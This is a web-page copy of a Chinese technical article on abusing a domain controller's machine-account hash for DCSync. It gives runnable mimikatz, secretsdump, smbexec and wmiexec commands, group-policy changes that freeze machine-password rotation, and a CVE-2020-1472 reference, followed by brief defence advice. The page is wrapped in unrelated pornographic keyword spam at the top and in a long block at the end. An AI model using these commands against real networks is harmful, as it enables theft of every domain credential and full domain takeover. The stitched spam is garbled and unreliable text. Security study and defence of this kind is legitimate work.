精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

域滲透——使用MachineAccount實現DCSync

安全
本文介紹了通過域控制器的計算機帳戶口令hash實現DCSync的方法,分析利用思路,給出防御建議。

[[344260]]

 0x00 前言

在之前的文章《域滲透——DCSync》提到過DCSync的利用條件:

獲得以下任一用戶的權限:

· Administrators組內的用戶

· Domain Admins組內的用戶

· Enterprise Admins組內的用戶

· 域控制器的計算機帳戶

本文將要補全上篇文章中未提到的最后一種利用方法,介紹如何通過域控制器的計算機帳戶口令hash實現DCSync。

0x01 簡介

本文將要介紹以下內容:

· MachineAccount簡介

· 獲得MachineAccount口令hash的方法

· 使用MachineAccount實現DCSync

· 防御檢測

0x02 MachineAccount簡介

MachineAccount是每臺計算機在安裝系統后默認生成的計算機帳戶。

計算機帳戶的密碼存儲在注冊表的位置:HKLM\SECURITY\Policy\Secrets\$machine.ACC。

如果計算機加入域中,會將計算機帳戶的密碼同步到域控制器并保存在域控制器的NTDS.dit文件中。

計算機帳戶的密碼默認每30天自動更新,密碼長度為120個字符,所以說,即使獲得了計算機帳戶密碼的hash,也很難還原出計算機帳戶的明文口令。

關閉當前計算機帳戶密碼自動更新的兩種方法(適用于工作組):

1.修改組策略

組策略位置:

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\

如下圖:

域滲透——使用MachineAccount實現DCSync

默認未啟用,如果設置為啟用后,將會停止更新密碼。

參考資料:

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2003/cc785826(v=ws.10)

2.直接修改注冊表

注冊表位置:HKLM\System\CurrentControlSet\Services\Netlogon\Parameters\

將DisablePasswordChange的值設為1。

關閉域內計算機帳戶密碼自動更新的兩種方法(適用于域網絡):

1.修改組策略

這里需要修改域組策略,在域控制器上打開Group Policy Management后,選擇Default Domain Policy。

如下圖:

域滲透——使用MachineAccount實現DCSync

組策略位置:

Computer Configuration\Windows Settings\Security Settings\Local Policies\Security Options\

2.修改組策略的配置文件

Default Domain Policy對應的guid為31B2F340-016D-11D2-945F-00C04FB984F9

配置文件路徑為:

域滲透——使用MachineAccount實現DCSync

例如我的測試環境下,路徑對應為:

\\test.com\SYSVOL\test.com\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit

修改文件GptTmpl.inf,在[Registry Values]下添加新的內容:

MACHINE\System\CurrentControlSet\Services\Netlogon\Parameters\DisablePasswordChange=4,1

如下圖:

域滲透——使用MachineAccount實現DCSync

強制域控制器更新組策略,命令如下:

gpupdate /force

配置完成,將系統時間調快30天,hash保持不變。

0x03 獲得MachineAccount口令hash的方法

1.通過注冊表文件導出當前計算機帳戶的口令hash

mimikatz命令示例:

privilege::debug
token::elevate
lsadump::secrets

返回的結果中,$machine.ACC項對應計算機帳戶,如下圖:

域滲透——使用MachineAccount實現DCSync

其他從注冊表導出的方法可參考之前的文章《滲透技巧——通過SAM數據庫獲得本地用戶hash》

2.使用DCSync導出所有計算機帳戶的口令hash

(1)使用mimikatz

在域控制器上使用mimikatz導出域內所有用戶的hash,命令示例:

mimikatz.exe "lsadump::dcsync /domain:test.com /all /csv" exit

其中以$字符結尾的為計算機帳戶。

其他環境下的使用方法可參考之前的文章《域滲透——DCSync》。

(2)使用secretsdump.py

需要安裝Python環境和Impacket包,實際使用時可以將Python代碼編譯成exe文件。

命令示例:

python secretsdump.py test/Administrator:DomainAdmin123!@192.168.1.1

secretsdump.py相比于mimikatz,最大的優點是支持從域外的計算機連接至域控制器。

secretsdump.py的實現原理:

使用計算機帳戶口令hash通過smbexec或者wmiexec遠程連接至域控制器并獲得高權限,進而從注冊表中導出本地帳戶的hash,同時通過Dcsync或從NTDS.dit文件中導出所有域用戶的hash。

3.通過漏洞CVE-2020-1472

參考資料:

https://www.secura.com/pathtoimg.php?id=2055

CVE-2020-1472能夠在未授權的狀態下遠程修改目標計算機帳戶的口令hash。

注:

CVE-2020-1472只能修改域控制器NTDS.dit文件中保存的計算機帳戶hash,無法修改注冊表中保存的本地計算機帳戶hash。

當域控制器中NTDS.dit文件和注冊表文件的計算機帳戶口令hash不同步時,有可能影響系統的正常功能。

0x04 使用MachineAccount實現DCSync

例如,我們獲得了域控制器DC1的計算機帳戶口令hash為7da530fba3b15a2ea21ce7db8110d57b。

1.使用mimikatz

這里需要制作白銀票據(Silver Ticket),接著獲得LDAP服務的訪問權限,細節可參考之前的文章《域滲透——Pass The Ticket》。

命令示例:

mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-254706111-4049838133-2416586677 /target:DC1.test.com /service:LDAP /rc4:7da530fba3b15a2ea21ce7db8110d57b /user:krbtgt /ptt" "lsadump::dcsync /domain:test.com /all /csv" exit

在細節上需要注意以下方面:

· 只能在域內計算機上運行,不支持域外

· /sid表示域的sid,獲取方法可參考之前的文章《滲透基礎——活動目錄信息的獲取》

· /rc4表示計算機帳戶的NTLM hash

· /user:krbtgt表示偽造成用戶krbtgt,生成票據

注:域sid的簡單獲取方法。

任一域用戶的sid去除最后一位就是域的sid。

2.使用secretsdump

命令示例:

python secretsdump.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1

在細節上需要注意以下方面:

· secretsdump支持從域外的計算機連接至域控制器

· 如果使用域內普通計算機帳戶的口令hash連接對應的計算機,那么會失敗,提示rpc_s_access_denied

· 可以通過wmiexec.pysmbexec.py遠程執行cmd命令

命令示例:

python smbexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv
python wmiexec.py -hashes :7da530fba3b15a2ea21ce7db8110d57b test/DC1$@192.168.1.1 whoami /priv

注:

使用計算機帳戶具有高權限,如下圖:

域滲透——使用MachineAccount實現DCSync

0x05 防御檢測

檢測DCSync后門的方法可參考《域滲透——DCSync》

站在防御的角度,如果域管理員的權限被攻擊者獲得,在嘗試踢出攻擊者的過程中,不僅需要修改域管理員用戶的口令,同樣需要更新計算器帳戶的口令hash,檢測域組策略是否被配置成開啟DisablePasswordChange

0x06 小結

本文介紹了通過域控制器的計算機帳戶口令hash實現DCSync的方法,分析利用思路,給出防御建議。

【編輯推薦】

 

責任編輯:姜華 來源: 嘶吼網
相關推薦

2016-03-22 10:14:25

域滲透滲透測試域控權限

2016-12-13 08:45:48

2015-10-27 11:11:46

2019-03-29 09:39:24

域滲透DNSWindows

2021-10-11 10:39:13

內網信息收集

2012-11-29 16:11:06

2012-06-05 10:15:43

jQuery

2021-08-05 11:30:49

Linux滲透測試

2010-09-15 15:25:11

2024-08-02 08:21:52

Spring項目方式

2021-10-15 05:55:52

OWT滲透WiFi網絡

2010-12-27 09:19:23

2015-02-27 16:10:25

2011-07-15 11:11:13

AD域控制器

2011-07-15 10:43:06

AD域控制器

2024-03-20 13:19:53

2009-11-04 11:07:27

無線接入網

2013-04-18 17:07:36

2021-03-05 11:20:24

HTTPWebshellWeb服務器

2013-04-12 13:21:44

點贊
收藏

51CTO技術棧公眾號

欧美一区二区三区四区五区| 久久久久久久精| 九九精品视频在线观看| 国产又粗又猛又色| 日本少妇一区| 亚洲国产精品人人做人人爽| 欧洲精品久久| 亚洲国产av一区二区| 欧美亚洲一区二区三区| 久久精品国产一区| 少妇光屁股影院| japansex久久高清精品| 日韩欧美精品网址| 欧美极品少妇无套实战| 高清日韩av电影| 国产美女在线观看一区| 欧美做爰性生交视频| 亚洲熟女www一区二区三区| 亚洲传媒在线| 精品日韩成人av| a在线观看免费视频| 国产一二三在线| 亚洲美女区一区| 日韩欧美在线电影| 手机在线不卡av| 极品美女销魂一区二区三区| 日本久久久久久| 免费一级片在线观看| 成人一区而且| 日韩精品在线视频| 亚洲精品国产久| 成人全视频免费观看在线看| 欧美日韩国内自拍| 国产91在线亚洲| 黄色精品在线观看| 国产精品三级视频| 日韩不卡av| 四虎精品在线| 不卡av在线网| 精品999在线观看| 欧美 日韩 国产 在线| 韩国毛片一区二区三区| 国产中文字幕日韩| www.色国产| 奶水喷射视频一区| 欧美性受xxxx白人性爽| www.国产成人| 国产精品久久久免费| 久久久欧美一区二区| 天天综合天天做| 女人色偷偷aa久久天堂| 久久综合国产精品台湾中文娱乐网| 自拍偷拍亚洲天堂| 视频国产一区| 在线精品国产成人综合| 亚洲av毛片基地| 日本久久黄色| 日韩中文字幕在线看| 久久久精品少妇| 亚洲电影影音先锋| 久久99精品久久久久久噜噜| 18精品爽视频在线观看| 亚洲国产高清视频| 57pao成人国产永久免费| 亚洲一区欧美在线| 久久天堂成人| 国产精品视频中文字幕91| 中文字幕在线网站| 国产在线观看一区二区| 91青青草免费观看| 五月婷婷久久久| 久久午夜免费电影| 亚洲人成人77777线观看| 米奇精品一区二区三区| 亚洲免费看黄网站| 丝袜人妻一区二区三区| 成人av免费电影网站| 欧美日韩一区二区不卡| 日本特黄在线观看| 嫩草国产精品入口| 伊是香蕉大人久久| 免费在线观看黄色av| 亚洲美女啪啪| 国产精品入口福利| 亚洲国产欧美另类| 久久久久久一二三区| 日韩最新中文字幕| 国产精品电影| 欧美日本一区二区三区四区| 日本wwwxx| 欧美美女在线| 欧美成在线观看| 一二三区免费视频| 国产一区二区三区免费| 免费国产一区二区| yellow91字幕网在线| 色综合天天综合给合国产| 亚洲精品久久久久久宅男| 黑人久久a级毛片免费观看| 亚洲人成网在线播放| 国产67194| 快she精品国产999| 成人av免费在线看| 97最新国自产拍视频在线完整在线看| 亚洲精品乱码久久久久久| 99福利在线观看| 麻豆一区在线| 揄拍成人国产精品视频| 国产精品99无码一区二区| 蜜桃久久久久久久| 久久久影院一区二区三区| 黄色网址在线免费| 91成人在线观看喷潮| 波多野结衣一二三区| 久久久精品久久久久久96| 欧美专区在线播放| 亚洲欧美强伦一区二区| 国产精品久久久一区麻豆最新章节| 国产中文字幕二区| 欧美日韩黄色| 久久久久www| 国产三级理论片| 91丨porny丨中文| bt天堂新版中文在线地址| 欧美aaa级| 亚洲色图13p| 日日夜夜综合网| 国产91精品入口| 国产成人三级视频| 九七电影院97理论片久久tvb| 亚洲女人天堂视频| 成人免费看片98欧美| 成人精品国产免费网站| 精品91一区二区三区| 成人动漫视频在线观看| 中文在线不卡视频| 成人av网站在线播放| 26uuu欧美| 免费av观看网址| 啪啪激情综合网| 97精品国产97久久久久久免费 | 99久久久久久久久久| 欧美视频二区| 99久热re在线精品996热视频| 黄色av电影在线观看| 欧美美女一区二区三区| 九九热久久免费视频| 美女性感视频久久| 一区二区三区四区欧美日韩| 精品美女一区| 久久久国产视频| 国产白浆在线观看| 一级特黄大欧美久久久| 制服丝袜在线第一页| 在线看片欧美| 久久精品日产第一区二区三区乱码| 17videosex性欧美| 日韩精品在线观看一区二区| 91丨九色丨海角社区| 国产精品成人一区二区艾草 | 中文字幕第三页| 亚洲国产成人在线| 在线一区二区不卡| 欧美精品三区| 国偷自产av一区二区三区小尤奈| 色综合亚洲图丝熟| 国产亚洲一区精品| 国产精品无码免费播放| 亚洲一区二区影院| 国产精品久久不卡| 日本不卡中文字幕| 99热都是精品| 日韩精品欧美大片| 国产精品亚发布| 四虎影院观看视频在线观看| 亚洲第一男人av| www.日韩一区| 亚洲精品国产精华液| 变态另类丨国产精品| 美女精品一区二区| av在线com| 欧美色图一区| ts人妖另类在线| 亚洲深夜视频| 久久久精品欧美| 深夜福利在线看| 69堂国产成人免费视频| 日韩欧美三级视频| 成人欧美一区二区三区黑人麻豆| 无码国产精品一区二区免费式直播| 久久国产日本精品| 日本道在线视频| 亚洲精品国产setv| 亚洲最大成人在线| 亚洲第一二三四区| 欧美俄罗斯性视频| www.亚洲视频| 亚洲高清福利视频| 国产精品亚洲lv粉色| 欧美日韩亚洲视频| 欧美日韩国产精品一区二区三区 | 精品久久久久久久人人人人传媒| 波多野结衣啪啪| 亚洲精品v日韩精品| 亚洲自拍偷拍图| 成人激情av网| 国产欧美一区二| 久久久久国产精品一区二区| 日本男女交配视频| 亚洲欧美色图| 视频一区视频二区视频三区视频四区国产| 白白在线精品| 国产拍精品一二三| 国产精品久久无码| 国产成人精品一区二三区在线观看 | 97碰碰碰免费色视频| 黄色的网站在线观看| 亚洲欧美三级伦理| 欧美 日韩 国产 在线| 69精品人人人人| 中文字幕一区二区免费| 精品久久久香蕉免费精品视频| 国产女人18水真多毛片18精品| 国产农村妇女毛片精品久久麻豆| 中文字幕天堂av| 国产精品一品二品| 日本三级黄色网址| 人妖欧美一区二区| 国产偷人视频免费| 国产欧美一区二区色老头 | 欧美亚洲在线| 激情深爱综合网| 国语自产精品视频在线看8查询8| 中文字幕制服丝袜在线| 日韩精品免费| 日韩在线电影一区| 国产一区二区三区四区二区| 欧美精品一区二区三区在线看午夜 | 九九久久99| 亚洲视频国产精品| 亚洲国产私拍精品国模在线观看| 国产普通话bbwbbwbbw| 欧美日韩精品一二三区| 青娱乐在线免费视频| 一本色道a无线码一区v| 国产三级av片| 欧美日韩国产综合新一区 | 色婷婷国产精品| 日韩一区二区视频在线| 亚洲午夜电影在线观看| 国产午夜视频在线播放| 亚洲一区欧美一区| 国产精品成人国产乱| 亚洲一区在线观看免费 | 欧洲在线/亚洲| 午夜影院免费在线观看| 日韩欧美第一页| 亚洲免费视频二区| 欧美日韩综合一区| 国产日韩免费视频| 日韩欧美一区二区视频| www.成人在线观看| 亚洲第一精品自拍| 欧美成人综合在线| 亚洲视频在线观看网站| 在线观看麻豆蜜桃| 久久中文字幕一区| 超碰在线资源| 国产mv久久久| 欧美aaa级| 成人资源视频网站免费| 欧美福利在线播放网址导航| 欧美一区二区高清在线观看| 成人一区二区| 日本精品视频在线观看| 国产免费美女视频| 国产精品午夜春色av| www.97视频| 亚洲一区二区在线视频| 手机看片久久久| 欧美精品在线观看播放| 亚洲av无码乱码国产精品久久| 亚洲精品第一页| a中文在线播放| 欧美精品videofree1080p| 欲香欲色天天天综合和网| 国产日韩欧美黄色| 久久国产精品色av免费看| 视频一区视频二区视频三区视频四区国产| 亚洲成av人片乱码色午夜| 成人免费视频91| 麻豆传媒一区二区三区| 欧美日韩人妻精品一区在线| 久久综合九色综合欧美98| 91免费公开视频| 日韩欧美中文第一页| 91麻豆一区二区| 亚洲精品久久久久久久久久久久久 | 久久香蕉国产线看观看99| 老司机成人免费视频| 高潮白浆女日韩av免费看| 97人妻一区二区精品免费视频| 亚洲国产中文字幕在线观看| 日本三级在线视频| 97人人模人人爽人人喊中文字| 六九午夜精品视频| 久久天堂国产精品| 欧美久久一区| 乌克兰美女av| 91老师国产黑色丝袜在线| 中文字幕亚洲欧美日韩| 欧美性一二三区| 天天干在线观看| 久久97精品久久久久久久不卡| 最新日韩一区| 久久久福利视频| 午夜天堂精品久久久久| 中文字幕久久av| 国产日产欧产精品推荐色 | 99香蕉国产精品偷在线观看 | 国产欧美一区二区视频| 色婷婷成人网| 日韩国产精品一区二区三区| 亚洲人成免费| 91精品国产高清91久久久久久| 国产精品欧美一级免费| 在线观看日本网站| 亚洲国产中文字幕久久网 | 欧亚精品中文字幕| 国产精品欧美大片| 黄色特一级视频| 国产一区二区调教| 人人艹在线视频| 欧美特级限制片免费在线观看| 四虎在线视频| 2019中文在线观看| 精品av导航| 欧美 日韩 亚洲 一区| 成人免费毛片片v| 国产真人真事毛片| 精品美女被调教视频大全网站| 18加网站在线| 51精品国产人成在线观看 | 欧美三级午夜理伦三级小说| 欧美图片激情小说| 成人av免费在线观看| 久久亚洲AV无码| 亚洲第一综合天堂另类专| 91九色在线看| 精品国产一区二区三区麻豆小说 | 国产免费播放一区二区| aⅴ在线免费观看| 久久久国产午夜精品| 国产99免费视频| 在线亚洲午夜片av大片| 成人性片免费| 一本—道久久a久久精品蜜桃| 久久国产精品第一页| 亚洲欧美精品aaaaaa片| 日韩欧美不卡一区| 久久五月精品中文字幕| 国内成+人亚洲| 久久一二三四| 黄色裸体一级片| 欧美一区二区人人喊爽| 免费不卡av| 欧美国产一区二区在线| 青青草97国产精品免费观看| 女人十八毛片嫩草av| 欧美一区2区视频在线观看| 欧美videossex另类| 开心色怡人综合网站| 日日欢夜夜爽一区| 日本一二三区在线观看| 欧美精品一区二区三区久久久| 色偷偷色偷偷色偷偷在线视频| 日韩欧美99| 国产精品一区2区| 日本免费在线观看视频| 日韩在线欧美在线| 日韩欧美中文字幕在线视频| 欧美丰满熟妇bbbbbb百度| 国产欧美日韩精品a在线观看| 国产农村妇女毛片精品| 97婷婷大伊香蕉精品视频| 精品久久久久久久久久久aⅴ| 激情久久综合网| 午夜精品久久久久| 五十路六十路七十路熟婆| 午夜亚洲激情| 国产日韩精品中文字无码| 日韩欧美中文字幕公布| 澳门成人av网| 成人在线免费观看视频网站| 久久亚区不卡日本| wwwxxxx国产| 国产精品免费电影| 黄色亚洲在线| 免费成人美女女在线观看| 亚洲精品美女在线观看|